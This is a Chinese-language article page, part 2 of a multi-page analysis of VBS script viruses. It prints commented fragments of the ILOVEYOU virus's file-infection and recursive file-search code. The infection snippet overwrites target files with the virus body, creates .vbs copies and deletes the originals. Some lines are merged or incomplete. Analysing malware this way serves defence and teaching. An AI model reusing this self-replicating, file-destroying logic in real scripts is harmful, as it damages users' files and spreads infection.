用户登录  |  傲看软件园 用户注册
文章中心广告代码ASP源码PHP源码JSP源码.NET源码源码相关傲看留言板繁體中文
当前位置:傲看软件园文章中心电脑安全安防新闻

VBS脚本病毒原理分析及防范

减小字体 增大字体 作者:风未起时  来源:中国站长学院  发布时间:2008-10-20 20:29:55
二、Vbs脚本病毒原理分析

  1.vbs脚本病毒如何感染、搜索文件

  VBS脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部,并在顶部加入一条调用病毒代码的语句,而爱虫病毒则是直接生成一个文件的副本,将病毒代码拷入其中,并以原文件名作为病毒文件名的前缀,vbs作为后缀。下面我们通过爱虫病毒的部分代码具体分析一下这类病毒的感染和搜索原理:
以下是文件感染的部分关键代码:

  Set fso=createobject("scripting.filesystemobject")  '创建一个文件系统对象
  set self=fso.opentextfile(wscript.scriptfullname,1) '读打开当前文件(即病毒本身)
  vbscopy=self.readall    ' 读取病毒全部代码到字符串变量vbscopy…… 
  set ap=fso.opentextfile(目标文件.path,2,true) ' 写打开目标文件,准备写入病毒代码
  ap.write vbscopy        ' 将病毒代码覆盖目标文件
  ap.close
  set cop=fso.getfile(目标文件.path)   '得到目标文件路径
  cop.copy(目标文件.path & ".vbs")   ' 创建另外一个病毒文件(以.vbs为后缀)
  目标文件.delete(true)   '删除目标文件

  上面描述了病毒文件是如何感染正常文件的:首先将病毒自身代码赋给字符串变量vbscopy,然后将这个字符串覆盖写到目标文件,并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本,最后删除目标文件。

  下面我们具体分析一下文件搜索代码:

  '该函数主要用来寻找满足条件的文件,并生成对应文件的一个病毒副本
  sub scan(folder_)  'scan函数定义,
  on error resume next   '如果出现错误,直接跳过,防止弹出错误窗口
  set folder_=fso.getfolder(folder_)
     set files=folder_.files    ' 当前目录的所有文件集合
     for each file in filesext=fso.GetExtensionName(file)  '获取文件后缀
     ext=lcase(ext)     '后缀名转换成小写字母
     if ext="mp5" then  '如果后缀名是mp5,则进行感染。请自己建立相应后缀名的文件,最好是非正常后缀名 ,以免破坏正常程序。
    Wscript.echo (file)
   end if
  next
  set subfolders=folder_.subfolders
  for each subfolder in subfolders  '搜索其他目录;递归调用
   scan( ) 
   scan(subfolder)
  next
  end sub

  上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍,非常巧妙,采用了一个递归的算法遍历整个分区的目录和文件。

  2.vbs脚本病毒通过网络传播的几种方式及代码分析

  VBS脚本病毒之所以传播范围广,主要依赖于它的网络传播功能,一般来说,VBS脚本病毒采用如下几种方式进行传播:


上一页  [1] [2] [3] [4] [5] [6] [7]  下一页

Tags:

作者:风未起时

文章评论评论内容只代表网友观点,与本站立场无关!

   评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论

精品栏目导航

关于本站 | 网站帮助 | 广告合作 | 下载声明 | 友情连接 | 网站地图
冀ICP备08004437号 | 客服Q:354766721 | 交流群83228313
傲看软件园 - 绿色软件,破解软件下载站! 源码网 源码之家 绿软之家
Copyright © 2003-2010 OkHan.Net. All Rights Reserved .
页面执行时间:46,031.25000 毫秒
Powered by:OkHan CMS Version 4.0.0 SP2